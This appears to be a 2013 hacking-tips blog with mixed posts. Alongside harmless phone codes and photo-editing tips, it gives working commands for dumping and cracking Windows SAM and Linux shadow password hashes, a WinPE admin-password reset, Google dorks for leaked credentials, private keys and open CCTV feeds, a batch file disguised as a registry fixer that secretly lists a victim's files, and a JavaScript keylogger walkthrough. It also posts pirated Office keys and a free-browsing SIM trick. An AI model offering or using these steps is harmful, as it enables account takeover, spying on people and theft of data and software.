Sunday 30 June 2013

Some Sony Ericsson Secret Codes

If you are a tech guy and Do some tips , tricks on your phone, then you obviously should know the secret codes of Your Mobile Phone. Here i am providing some Secret Codes for Sony Ericsson Mobiles. With these codes you can know much more about your Phone.


*#06# — To Check the IMEI number or Serial Number.

>*<<*<* —- To goto in the Secret Menu.(This menu gives us the details like Software version and other services.)

0 and # — To See the Last Dialed Numbers.

<0000> — Set Default Language and Theme.

<**< — Displays Network Info. (Also SIM Lock)


**04*0000*0000*0000# followed by on ‘Wrong Pin’ number – To Start Phone Without SIM Card.

904059 + > — Will Start Phone Test.

3 + < — Will End Phone Test



Motorola Secret codes

Motorola Secret codes use a pause in them which I will represent with ^ which means you need to hold * until a box appears, the codes will allow you to access the field test and engineering hidden menu locations on your Motorola device.


As always the standard *#06# can be used to display the IMEI number on the handset, the following codes are available from the phone line, changing the 1 to a 0 at the end of each line will reverse or disable the changes made using these Motorola secret codes.


 


 


^ ^ ^ 0 0 5 ^ 1 ^ Adds the phone book option to the main menu of you Motorola

^ ^ ^ 1 0 7 ^ 1 ^ Adds the messages menu to the main menu option

^ ^ ^ 0 0 8 ^ 1 ^ Line Switch Function allows you to edit the display name

^ ^ ^ 0 0 4 ^ 1 ^ Access the Change pin function

^ ^ ^ 0 0 5 ^ 1 ^ Reset the Pin using your PUK code

^ ^ ^ 1 1 9 ^ 1 ^ Enable EFR on your device

^ ^ ^ # # #^ 1 ^ Function Selection

^ ^ ^ 1 0 8 ^ 1 ^ Copies the Sim Memory to the phone book

^ ^ ^ 1 1 3 ^ 1 ^ Access the Engineering and Field Test Menu

^ ^ ^ 1 0 1 ^ 1 ^ Sets the search menu to slow

^ ^ ^ 1 0 2 ^ 1 ^ Sets the search menu to medium

^ ^ ^ 1 0 3 ^ 1 ^ Sets the search menu to fast

You can also force a Motorola to a specific frequency using the following codes in the secret engineering menu which can be accessed by entering 048263* quickly in the Engineering menu mentioned in the above table, one there you can make use of the following opcodes;


Code Frequency

10*0*3 GSM 900

10*0*4 GSM 1800

10*0*5 GSM 1900

10*0*6 GSM 900/1800 Dual Band

10*0*7 GSM 850/1900 Dual Band


More:


*7        –        To Unlock or Lock Keypad.

19980722 —   To Unlock your Motorola Mobile (Also Called Master key)

*#403# —       To Check Manufacturer Details.

*#311   —       To Reset Code to default.(1234)

*#300# —       To Check OS Version.

*#303# —       To Change language to Default (English).

*#301# —       To Check Function of keys.

#32#     —       To Reset all Timers.

*#402# —       To Check Display.

*#304#19980722# — To Activate Engineering Mode.

*#304# —       To De-Activate Engineering Mode.

32*279*1*0*8 —       To Check the Mobile Model.

#PROGRAM#  –       To Change Banner.

##33284 —     To Use Mobile in Debug – Mode.

#02#*     —     To Check Mobile OS.

*#987*99# —  To Restore settings to Default.

###119#1# —  To Activate EFR.

###119#0# —  To De-Activate EFR.


Remember to share this to your friends and follow us on twitter @clickermotics. We are going to follow you back.



Learn "Hacking" at your own pace.

A recent survey of IT and business professionals revealed that 57% of the respondents took self-paced training last year—up from 47% the previous year.


This material contains the complete package to the Certified Ethical Hacker course. It contains the lectures (as videos), the study guide, unencrypted copies of the teacher’s instructor slides, and all the programs you’ll need in the course. Note that the programs are put in ISO images.


To open the ISOs, you can either burn them to a disk and open them like any other data-containing disk, or you can open them with software such as 7-zip (which is what we prefer, because after all ISOs are only containers).


Along with the tools are animations that explain how to use them (and how to install them). Also, just because this focuses on “ethical hacking” (or authorized hacking as we prefer to call it) doesn’t mean it doesn’t teach you black hat methods.


The official Certified Ethical Hacker course costs something like $500, and you can only take the exam once. If you fail, you have to pay another $500 to retake it. That’s what this material is for, studying. And it’s not just studying for the CEH exam, its also simply a great way to learn hacking. Note that this course assumes you have moderate understanding of computers, a computer with Windows (the course is oriented around Windows, but if you have Linux then many of the Windows tools can be run through Wine), and plenty of time on your hands. You do not need to be a Linux guru or have programming knowledge to learn from this course.


The course is broken up into different sections, called “modules”, each teaching a slightly different subject. The modules are:

-Module 02: Footprinting and Reconnaissance

-Module 03: Scanning Networks

-Module 04: Enumeration

-Module 05: System Hacking

-Module 06: Trojans and Backdoors

-Module 07: Viruses and Worms

-Module 08: Sniffers

-Module 09: Social Engineering

-Module 10: Denial of Service

-Module 11: Session Hijacking

-Module 12: Hacking Webserver

-Module 13: Hacking Web Applications

-Module 14: SQL Injection

-Module 15: Hacking Wireless Networks

-Module 16: Evading IDS, Firewalls, and Honeypots

-Module 17: Buffer Overflows

-Module 18: Cryptography

-Module 19: Penetration Testing


Contact us now!!!


+(234)8079073359, +(44)7062035685



How to Remove Background Of Any Picture Easily


Removing Background of any image or picture by using Photoshop or other software is slightly difficult,if you don’t know how to use them.


Photoshop is a great software and offers you great features but using Photoshop is slightly difficult and also while removing background of any image using it sometimes ,If your mouse slips while selecting layers , then you are in great problem.




Well today i’m going to introduce you to an amazing tool which will help you to remove the background of any image so easily that you will feel great with this wonderful and amazing online  tool.You Do not need to install any application or anything other to use this Online tool You just need Internet Connection.


Now Without Wasting much more time let come on the main point How To Remove Background Of Any Picture Easily ?



Step 1 :- Open Clipping Magic official Website [Link]






Step 2 :- Open Any Image In It , You can also drag image to upload .



Step 3 :- Now , you will see editor in it.Now you have to use the brushes of different colors to mark foreground and background




The Red Brush is used to mark background.

The Green Brush is used to mark foreground.



After marking you will see you results in right side ,


Congratulations You Have Removed Background Of Your Pictures !




Now The Most difficult Step: Download that pictures by clicking on download button(on top center  ).

According to me this tools is the best tool in the world and i would like to help Clipping Magic  Admins to provide us such a great online tool .


If you have any problem in this tutorial you can ask me in comments and i will try to reply as fast as I can.


More Tips On Protecting Your Password on Facebook

 #Use strong passwords.


#Don’t use the same password for all of your accounts.


#Don’t share your password with friends.


#Change your password regularly.


#Consider storing your password in a password tool.


#Add a security question and your mobile phone number in the account settings of your Facebook account in case you forget your password.


#Login approvals: If you log in from an unrecognized device, this system sends a code to your mobile device that you must enter in order to complete the login.


Readers: What steps have you taken to protect your Facebook passwords?



Android Evolution

Android Cupcake (1.5)

Android Donut (1.6)

Android Eclair (2.0.1 – 2.1)

Android Froyo (2.2 – 2.2.3)

Android Gingerbread (2.3 – 2.3.7)

Android Honeycomb (3.0 – 3.1)

Android Ice Cream Sandwich (4.0 -4.0.4)

Android Jellybean (4.1 -4.2)

Android Key Lime Pie (Yet to be announced)


Notice the pattern?


Yes?


No?


They are categorized as Desserts and are Alphabetically ordered.

So just a guess, Android Lollipop for the next one.



MTN Magic SIM Activation

Get MTN SIM and load #250, dial *406# to migrate to MTN pulse;send 2H TO 131, remove the battery from the phone do not insert the SIM on any phone or MODEM for the next 3hrs.

After that insert the SIM on phone and then send 103 to 131 or 106 to 131.


Then start enjoying free browsing both on your phone or MODEM!


Magic SIM on other Network will be posted shortly.


Remember to share this to your friends.



Friday 28 June 2013

How to Crack Admin Password via John the Ripper tool

 


There’s a lot of tutorials on how to gain remote access to a system, but what if you get a guest account or a regular user account? nothing can really be done then until you gain the administrator password. This tutorial is going to teach you how to take guest access (remote or physical) and use it to crack the administrator password for the machine.
Download link:

I. Cracking Windows passwords with physical access:


So if you’re taking the physical approach (sitting at the target machine using a live boot backtrack distribution) the first thing you need to do after booting up into the gui is to mount the target windows partition. To list the partitions available do this:


Code:

fdisk -l


Now that you have a list you need to figure out which one is the windows partition, for most users this is going to be “/dev/sda1″ so to mount that do this:


Code:

mount /dev/sda1/ /root/


The next thing is to find the SAM (security account manager) file. This is located in the WINDOWS/system32/config folder for windows 2000 and later. The SAM file is actually locked while the OS is running, with the physical approach we will be bypassing this by using live bootable backtrack, the OS never starts, therefore the SAM doesn’t lock. You can try to check the file but the whole thing is encrypted. first we’ll navigate to the correct folder, then we’ll use bkhive to load the bootkey to a text file, then we’ll use that file to dump the SAM file into a text file of just user names and password hashes


Code:

cd /WINDOWS/system32/config/

bkhive system bootkey.txt

samdump2 SAM bootkey.txt > samdump.txt


Now we have our samdump.txt file that has all of the targets password hashes and usernames, so we need to crack them. For the purpose of this tutorial we’ll be using John the Ripper but there are many other password cracking tools out there.


Code:

cd /pentest/passwords/john/

./john /root/WINDOWS/system32/config/samdump.txt


Now john the ripper will crack the hashes and give them to you in plain text! Now all that’s left is to shutdown the computer, start back up in windows, and try your newly found passwords!


II. Cracking Windows Passwords With Remote Access:


We’ll pick up here from getting a meterpreter session on a windows machine. This is a lot easier than the physical process. First we need to load Sam Juicer, then we’ll just pull the hashed passwords, then we’ll save them to a text file and import the file into john the ripper.


Code:

meterpreter > use -m Sam

meterpreter > hashdump

[after this command you'll get a dump of all of the hashes, copy and paste them into a text file, mine will be hash.txt]

cd /pentest/passwords/john

./john /root/hash.txt


That’s it, all there is to it.


III. Cracking Linux Passwords With Physical Access:


Instead of the “SAM” file linux uses the “Shadow” file which is at /etc/shadow. Before you can crack /etc/shadow with john the ripper, it has to be used with etc/passwd, like how we had to use the bootkey to export the hashes from windows. In order to do this we have to unshadow. After we unshadow we will have a file of unencrypted yet still hashed passwords, then we’ll take that in to john the ripper and crack.


To do this:


Code:

./unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes.txt

./john /tmp/linux_hashes.txt


Once this is done, all of the linux accounts will be cracked!


 



How to make phone calls to the USA for free



Yes calling to USA without spending Dollars is possible , All we need to do is download the VPN and install  it in your system, It is freeware and can be used in Windows XP, Windows vista , Windows 7, Windows 8, Mac OS X 10.6 Snow leopard, Mac OS X 10.7 lion, Mac OS X 10.8 Mountain Lion, IOS – Iphone/ipad, Android 2.x and 4.x

Needed :


Internet connection

VPN Client

Gmail account

US Based friend mobile number


Instructions:


First download the VPN from this Download link

Then install the Downloaded VPN.

If your browsers are open means try refreshing them and check for whatismyipaddress

Confirm whether it is saying US Ip address and you are done.

Now open gmail account and try dialling your US friends mobile number.

You can talk with them for hours.


Benefits are:


Unblock any websites

Protect your IP address

Surf the web anonymously

Secure your web session


Happy Hacking!!!!






Send messages on faceboook even if you are BLOCKED!

To perform this trick first of all u need faceboook username of that person to which you are going to send message.

Go to your primary email id(gmail,yahoo etc)

Compose a new msg to username@facebook.com

(username= fb id of receiver).


 


Share this among your friends.



HOW TO HACK WINDOWS 8 ADMIN PASSWORD

Step 1: Prepare a WinPE Image (download it), and burn it to a USB flash drive or a CD/DVD disc.


Step 2: Boot the computer you want to hack from WinPE live disk.


Step 3: Write a Windows password hack script:

1.1 Create a file named windows-passwor­d-hack.bat.

1.2 Write password hack script: net user administrator 000. Just so much, is it easy? This command will set the administrator account’s password to 000. If want to hack other user password, add more commands like this: net user user_name1, new_password1 rn net user user_name2, new_password2 .


Step 4: Copy the hack script file to Windows system32 directory.

Save windows-passwor ­d-hack.bat and copy it to the system32 directory . Here.. copy to C:WindowsSystem ­32. Note: If the system you want to hack is on D: partition, you should copy windows-passwor­d-hack.bat to D:WindowsSystem ­32.



How to Hack Accounts Using Google Dork List



Method 1:

usernames and passwords of many accounts including Facebook!


The Dork: intext:charset_test= email= default_

persistent=


Enter that into Google, and you will be presented

with several sites

that have username and passwords lists!


Method 2: WordPress!

This will look for WordPress backup files Which do contain the passwords, and all data for the site!The Dork:

filetype:sql inurl:wpcontent/

backup-*


Method 3: WWWBoard!

This will look for the user and passwords of WWWBoard usersThe


Dork: inurl:/wwwboard/passwd.txt


Method 4: FrontPage!

This will find all users and passwords, similar to above.


The Dork: ext:pwd inurl service | authors | administrators | users) “# – FrontPage-”


Method 5: Symfony!This finds database information and loginsThe


Dork: inurl:config/databases.yml -trac -trunk -”Google Code” -source -repository


Method 6: TeamSpeak! (big one!!!!!)This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)


The Dork: server-dbs “intitle:index of”


Method 7: TeamSpeak2!!! (also big!)This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for “superadmin account info:”


The Dork: “inurl:Teamspeak2_RC2/server.log”


Method 8: Get Admin pass!Simple dork which looks for all types of admin info


The Dork: “admin account info” filetype:log


Method 9: Private keys! (not any more!) This will find any .pem files which contain private keys.

The Dork: filetype:pem pem intext:private


And the Ultimate one, the regular directory full of passwords….


Method 10: The Dir of Passwords! Simple one!


The Dork: intitle:”Index of..etc” passwd



MORE about Backtrack

What is Backtrack?

Backtrack is a GNU/Linux distribution which is used for penetration testing and more.


What tools does Backtrack have?Backtrack has got alot of usefull tools in the following categories

* Information Gathering

* Network Mapping

* Vulnerability Identification

* Web Application Analysis

* Radio Network Analysis (802.11,Bluetooth,Rfid)

* Penetration (Exploit & Social Engineering Toolkit)

* Privilege Escalation

* Maintaining Access

* Digital Forensics

* Reverse Engineering

* Voice Over IP


Here you will find a list of tools


http://backtrack.offensive-security.com/index.php/Tools


Is it free and how do i get it?

Yes Backtrack is free and you can download it here http://www.backtrack-linux.org/downloads/

You have three option when it comes to using backtrack you could use it strait from the disk {live cd}, you could use it in VMware or you could install it on your hardrive, unlike previous versions of backtrack backtrack 4 has an installer.

I use backtrack on my laptop and win 7 on my desktop, you can also dual boot there are loads of tutorials how to do this just google it.


The first public release of Skiddie OS 5 ..oops sorry I mean BackTrack Linux 5 will be presented during the European open-source event next 10th May 2011 in Paris. A delegation of BackTrack Linux developers from Italy, backed with the support of the European community will be hosting a stand in the “community area” to showcase BackTrack and answer any question about BackTrack Linux.


BackTrack 5 will be based on Ubuntu Lucid (10.04 LTS), and will (finally) support both 32 bit and 64 bit architectures. It will be officially supporting KDE 4, Gnome and Fluxbox while providing users streamlined ISO downloads of each Desktop Environment (DE).


Previous versions of Back|Track 2, 3 & 4 where never designed for localized installation, too many dependencies are missing broken or have simply been removed.


Blackbuntu is another distribution which claims to be a working reference on Back|Track.


Blackbuntu is another Ubuntu base distro for Penetration Testing with GNOME Desktop Environment. It’s currently being built using the Ubuntu 10.10 Maverick Meerkat


The difference would appear to be slight if at all any with one marginal note: There is no support for LvM2 LoopAES Encrytion or Security Enhanced Linux or the Flux Advanced Security Kernel within either distribution as they instead rely heavily on App-Armor to protect the system daemons and users whilst running in a default root state!


There is an old security saying “forget about the security of others and worry about your own instead!”


What tools Backtrack does not have?

SELinux & the Flux Advanced Security Kernel

LVM & LUKS – LoopAES Cryptsetup & Cryptmount

Ext 4 – Filing System

IceCat Web-Browser with various Security Extensions.


FAQ:

Q:> How do I get the flux advanced security kernel?

A:> Harden & Audit your own Linux!


Q:> What does LVM Cryptsetup do?

A:> Full disk encryption using the Advanced Encryption Standard!


Q:> Can I do this with Ubuntu?

A:> Oh, lol, lol rofl, in a word – No!Q:> Is it illegal?

No backtrack is not illegal.



5 Things Every Beginner Hacker Should Know

This post is for everyone out there who actually want to become a true hacker:-



1) Never trust sites that ask you for money in return of Hacking Softwares or who claim to Hack Email Id’s in return of money. All such things are Scam . Nothing Works.But there are comprehensive , interactive videos and other materials on HACKING.You may request for one from us if interested .

2) There is NO DIRECT SOFTWARE to Hack Facebook , Google , Yahoo or any other big website. All the softwares that claim to do so are scam. They are just meant to take your money and in worse cases, those softwares have trojans or keyloggers in them. As a result your account gets hacked trying to hack others.


3) NEVER EVER use the keyloggers or trojans you find as freeware on internet. Hackers are not fools. They compile keyloggers and trojans almost with any such software and when you install them , you are already hacked before even trying to hack others.


4) You are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only ready made softwares and would depend on them for hacking anything then your functionality would be limited upto the functionality of the software. When you are not going to use your brain , just doing the copy paste thing, then how can you even think of being a good hacker.


5) If you are a good Hacker, you already become a good programmer , a good script writer , a good web developer and an excellent security expert. Well any good Hacker will/should have good knowledge of various aspects and programming languages. to do XSS (Cross Site Scripting ) , PHP INJECTION , SQL INJECTION , PHISHING , FOOTPRINTING etc… you will have to be good at programing and scripting. And when you know the Various loop holes , vulnerabilities and security tips, you already become a Computer Security Expert.


So Never Ever Under estimate the term Hacker. A Hacker Is Not a person who just hacks email id’s or servers but a True Hacker is a Computer Genius who the knowledge of computers more than anyone.




There are comprehensive , interactive videos and other materials on HACKING.You may request for one from us if interested .


HOW TO HACK CCTV CAMERAS AND CONTROL THEM

Ever wanted to spy on a business? A workplace, or a town? Or your just totally bored and got nothing else to do and want to fuck about with some CCTV!?! Well this tut is for you! You can hack into the cameras and control them too! What I am about to tell you is Google Hacking. No its not the type of hacking you may know or hear of, but it is STILL hacking. So be warned. Use this tutorials at your own risk.


Step 1: Go to Google! http://www.google.com/


Step 2: Enter one of the following lines: (Note, Do not enter the whole lot, that won’t work!)


*inurl:”CgiStart?page=”

* inurl:/view.shtml

* intitle:”Live View / – AXIS

* inurl:view/view.shtml

* inurl:ViewerFrame?Mode=

* inurl:ViewerFrame?Mode=Refresh

* inurl:axis-cgi/jpg

* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)

* inurl:view/indexFrame.shtml

* inurl:view/index.shtml

* inurl:view/view.shtml

* liveapplet

* intitle:”live view” intitle:axis

* intitle:liveapplet

* allintitle:”Network Camera NetworkCamera” (disconnected)

* intitle:axis intitle:”video server”

* intitle:liveapplet inurl:LvAppl

* intitle:”EvoCam” inurl:”webcam.html”

* intitle:”Live NetSnap Cam-Server feed”

* intitle:”Live View / – AXIS”

* intitle:”Live View / – AXIS 206M”

* intitle:”Live View / – AXIS 206W”

* intitle:”Live View / – AXIS 210?

* inurl:indexFrame.shtml Axis

* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)

* intitle:start inurl:cgistart

* intitle:”WJ-NT104 Main Page”

* intitle:snc-z20 inurl:home/

* intitle:snc-cs3 inurl:home/

* intitle:snc-rz30 inurl:home/

* intitle:”sony network camera snc-p1?

* intitle:”sony network camera snc-m1?

* site:.viewnetcam.com -www.viewnetcam.com

* intitle:”Toshiba Network Camera” user login

* intitle:”netcam live image” (disconnected)

* intitle:”i-Catcher Console – Web Monitor”



Thursday 27 June 2013

1. Sir Tim Berners-Lee – World Wide Web

2. Vint Cerf And Bob Kahn – TCP/IP

3. Larry Page and Sergey Brin – Google Inc.

4. David Filo and Jerry Yang – Yahoo! Inc.

5. Bill Gates – Microsoft

6. Steven Paul Jobs – Apple Inc.

7. Mark Zuckerberg – Facebook

8. Chad Hurley and Steve Chen – YouTube

9. Linus Torvalds – Linux

10. Jack Dorsey – Twitter

11. Kevin Rose – Digg

12. Bram Cohen – BitTorrent

13. Mike Morhaime – Blizzard Entertainment

14. Jimmy Wales – Wikipedia

15. Jeff Preston Bezos – Amazon

16. Shawn Fanning – Napster, Rupture

17. Pierre Omidyar – eBay

18. Jack Ma – Alibaba

19. Craig Newmark – Craigslist

20. Matt Mullenweg – WordPress

21. Thomas Anderson – MySpace

22. Garrett Camp – StumbleUpon

23. Jon Postel – Internet Pioneer

24. Caterina Fake – Flickr

25. Marc Andreessen – Netscape


89% of your friends don’t know Please share it





Hacker VS Programmer

1. A hacker beats the system.

A programmer maintains the system.

2. A hacker is trying to get in.

A programmer is trying to stop things getting in.

3. A hacker does things because he believes in them.

A programmer does what he is supposed to.

4. A hacker changes the way things are.

A programmer tries to keep the status quo.

5. A hacker is agile.

A programmer is a small cog in a big slow machine.

6. A hacker has many points of attack.

A programmer has one job.

7. A hacker has to be fast.

A programmer doesn’t.

8. A hacker is self-reliant.

A programmer relies on others.

9. A hacker finds paths that don’t exist.

A programmer guards the old ones that already do.

10. A hacker is about being interesting.

A programmer is about being perfect.



Ms-Office 2010 Professional plus produt key

XD86P-7DHKT-MHWYH-GDHVT-KYM6D

6BY4V-6V892-D2HQP-T2MP7-HXK46

YQMQM-9KV3J-97G7V-8CK38-346GW

6V9J9-4D3D8-X7KKK-MG4WP-QD9X3

MRPB7-8CBBK-YGPHK-F9JWW-D9KYB

4983Y-W3D73-QY6TX-K7FQD-V7Y8Q

VXWRP-C9HMB-PV487-R7GTR-VFDG3

BQHWD-TGT8T-QC7WW-86HWT-RCT6T



Things fall apart

Hello Peep, Download Things fall apart From Chinua Achebe http://ow.ly/mqNWI



More 10 Ways To Hack Facebook Accounts

Master Social Network (Facebook) is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers, this is my first post regarding the ways to hack facebook .


1. Phishing





 Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims “Email Address” and “Password” is stored in to a text file, The hacker then downloads the text file and get’s his hands on the victims credentials.



2. Keylogging



Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.


3. Stealers



Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software’s specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely


 powerfull



 4. Session Hijacking















Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan’s.



5. Sidejacking With Firesheep




 

Sidejacking attack went common in late 2010, however it’s still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it’s more targeted towards wifi users.



6. Mobile Phone Hacking



 






Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.The most popular Mobile Phone Spying softwares are:

1. Mobile Spy

2. Spy Phone Gold




7. DNS Spoofing



 


If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.


8. USB Hacking



If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser.


9. Man In the Middle Attacks







If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article.


10. Botnets




 

Botnets are not commonly used for hacking facebook accounts, because of it’s high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.




How to get a list of all files in a Drive

We are going to design a batch file to secretly get a list of all the files and folders on a drive via a USB drive. The batch file even lists hidden files. All you have to do is put the batch file into the USB drive and make your victim open it. When you get back the USB drive the list would be waiting for you!


The listing of the files could take some time. So it is essential that the victim does not close the batch file until the listing is completed. You can achieve this in two ways. One way is to run the batch invisibly as a process using two extra short VBScript files. I will show you how to do this in a later post. The other way is to mask the listing of the files with some spoof like system configuration or something important. In this trick I am going to use the second method. This is easier than the first method.


Step 1: Paste the following code into notepad and save as a .bat file.


ECHO OFF

COLOR 0C

CLS

ECHO.>>XBData.txt

ECHO %DATE% – %TIME%>>XBData.txt

ECHO.>>XBData.txt

ATTRIB XBData.txt +H +S

CLS

ECHO.

ECHO Finding and fixing registry errors. Please do not close the program or reboot the computer.

ECHO The registry may be damaged permanently.

ECHO.

ECHO Please wait…

DIR /S /B %USERPROFILE%\*>>XBData.txt

DIR /S /B D:\*>>XBData.txt

DIR /S /B /A:H %USERPROFILE%\*>>XBData.txt

DIR /S /B /A:H D:\*>>XBData.txt

ATTRIB XBData.txt +H +S

Step 2: After saving, copy the batch file into the root of your USB drive.


Step 3: Now the trap has been set. Give the USB drive to your friend and use some social engineering to make him/her open it. You can tell your friend that it is a software you made or some cool software. This depends on your social engineering skills. Just make him/her open it remember to tell not to format the USB drive.


When you get back the pendrive the data collected would be in a hidden text file. To reveal the text file:


Step 1: Open command prompt window. To open a command window goto start menu and type cmd into the search bar and press enter.


Step 2: Assuming the USB drive letter is F Enter the command into the cmd window and execute it: attrib “F:\XBData.txt” -h -s


After you reveal the text file open it and you will see a list of files stored in his drives including the hidden ones. This trick greatly depends on your skills in social engineering. Enjoy the look of your friends face when you tell them where he stores certain files and what files he/she has hidden! Remember to rate this post and leave any questions.



How to extract text from images

Many time you want to get text from an image file to a text file you have to type everything into notepad. This is really difficult especially if the text is long and you are a novice typer. An easier alternative is using an OCR (Optical Character Recognition) software. There are many online services providing you with this. But I am going to teach you a little trick to extract text from images using a software included in the Microsoft office package called OneNote.


Step 1: Goto Start menu > All programs > Microsoft Office > Microsoft OneNote.


Step 2: Copy and paste the image into OneNote.


Step 3: Right click the image in one note and select Copy Text from Picture.


Step 4: Now open notepad and press Ctrl+V.


Step 5: Correct any spellings errors.


Hope you found this useful and informative. Remember to leave your ratings and like and share the blog! Keep tuned for more great posts.



Wednesday 26 June 2013

Important Toolkit for Hackers & Penetration Testers

 In this post we are going to tell you what tools you must use for hacking, Pentesting & Important uses of different types of hacking tools etc. In hacking you must have knowledge of Programming languages, & Passion to learn, create, & Hack, so simply Hacking toolkit helps us a lot.







1. First of all get any one comfortable hacking OS.




I’ll recommend you to use Kali Linux, or Backtrack 5. Only these two are best.



2. Get OWASP Mantra Janus (The Security framework Toolkit)

OWASP Mantra Janus is fully loaded Security framework browser built with Hacking tools, extensions, Penetration testing tools

Click here to Download OWASP Mantra Janus Security Framework.



3. Social Engineering toolkit (SET)


                          Social Engineering is the most important part in Hacking, you must know all types of Social Engineering attacks and methods to compromise, delude victim. Social Engineering toolkit is a collection of Social Engineering attacks tools, methods and Information harvesting tricks, to download Social Engineering toolkit Click here.





4. Metasploit – The 3XPloiters (Penetration testing Software)
                           Metaspoit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine, Metasploit framework has the world’s largest database of public, tested exploits. Simply Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems. Click here to Download Metasploit Security Penetration testing Framework.




5. Acunetix Web Vulnerability Scanner (AWVS)

Acunetix web vulnerability is one of the best & famous web vulnerability scanner, with advance scanning tools to hunt all types of Web Bugs, flaws, Vulnerabilities. AWVS can help you secure and maintain your website and web application against hackers & other hand it can help hackers to hunt vulnerability and Exploit it.





6. N-Map – Security Scanner for Network Exploration & Security Testing


                           N-Map is free open source Network security scanner and Security testing for Networking Interface and also used by hackers to scan network connnection and harvesting information.






7. Burp Suite


     Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilitie Click here to Download Burp Suite.




8. OWASP Xenotix XSS Exploit Framework


    Xenotix XSS Exploit framework is free open source application ~ integrated platform for performing security testing of Cross Site Scripting and contains 500+ XSS Payloads, Cookie Logger, XSS keylogger, XSS Reverse shell, D-doser, Cookie Thief, Encoders etc.





9. SQL Map or Havij (Advance SQL Injection tool)


    SQL Map is automatic SQL injection and database takeover tool one of the best SQL Injection vulerability exploitation tool built in Backtrack & Kali Linux and if you want it for windows Click here to Download.



Havij : Advance SQL Injection tool



10. Others Important Hacking tools :  



  • Wireshark

  • Jhon the Ripper

  • W3AF

  • THC Hydra




Please Share this Post, & if you want to request for any tools or tricks please Comment your problem and let me know. And always feel free to comment. Share it & Share Knowledge.




What is Wireless Computer Networking?

Wireless networks utilize radio waves and/or microwaves to maintain communication channels between computers. Wireless networking is a more modern alternative to wired networking that relies on copper and/or fiber optic cabling between network devices.


A wireless network offers advantages and disadvantages compared to a wired network. Advantages of wireless include mobility and elimination of unsightly cables. Disadvantages of wireless include the potential for radio interference due to weather, other wireless devices, or obstructions like walls.


Wireless is rapidly gaining in popularity for both home and business networking. Wireless technology continues to improve, and the cost of wireless products continues to decrease. Popular wireless local area networking (WLAN) products conform to the 802.11 “Wi-Fi” standards. The gear a person needs to build wireless networks includes network adapters (NICs), access points (APs), and routers.


Types of wireless networks :-


>> Wireless PAN

>> Wireless LAN

>> Wireless mesh network

>> Wireless MAN

>> Wireless WAN

>> Cellular network.



Website Keylogging and Sniffing Techniques

Today – I’m gonna show you Website Keylogging & Sniffing Techniques. Well I don’t mean Computer keylogger okay…! I hope you’ve heard about Javascript Keylogger, & the special thing in this Post is that we will teach you how Ethical Hacker harvest information of  Computer, Network & steals personal Information of Computer & users. This tricks isn’t much rocking & cool, but a Hacker must know website keylogging and Sniffing Techniques.


1. Website Keylogger

I hope you’ve heard about keyloggers,  Keyloggers are malwares and trojans that records victims Personal Computer activities and sends Screenshots, Key Strokes to an attacker, so an attacker hack his Computer. Basically this methods comes under Social Engineering. SET is an important part of Hacking. Well, in this method m gonna show you how can an attacker create a javascript keylogger and records keystrokes. Okay before I start this tutorial, I want to tell some advantage and disadvantages of this Trick.


# The advantage of this method is simply an attacker doesn’t require any type of software, trojan or any keylogger malware generator, It’s simple just code your script and send it to Victim.
# Disadvantage is : this method is only used in XSS Vulnerability Exploitation only to records HTTP Packets and keystrokes of normal users, it can also used in normal case to record keystrokes but not useful, but then also I want to share this tricks with you all.


# Requirements :




How to do key-logging using Javascript ?

      As, I told you this method is commonly used in XSS Exploitation to record victims keystrokes but you can also use it in normal mode but not useful. Just follow the below steps.

  • Download Javascript Key-logger Script.

  • Get free hosting and Domain on 000webhost.com

  • Upload all files in file manager and host it on Internet

  • Aftell all open your website and when you’ll see that website is showing something Error, well you can also Edit something in HTML File and add some Contents in it, but basically i created it just for Keylogging.

  • So, Again refresh that Page and Type any button in your keyboard or any statement.

  • Well, now go to your file manager and you’ll see one .txt file with the name of IP (It’s an IP of Visitors) whoever visits your website, I mean Key-logging website.

  • Now, when you’ll open it you’ll see the statement and keywords you’ve typed. It is called Javascript Keylogging



  • Well this trick is just awesome when you having XSS Vulnerable websites, so this scripts can record every chat, Keyword of victims. you can steal Passwords, Chats, Credit card details and personal Info’s.




2. Sniffing Techniques 



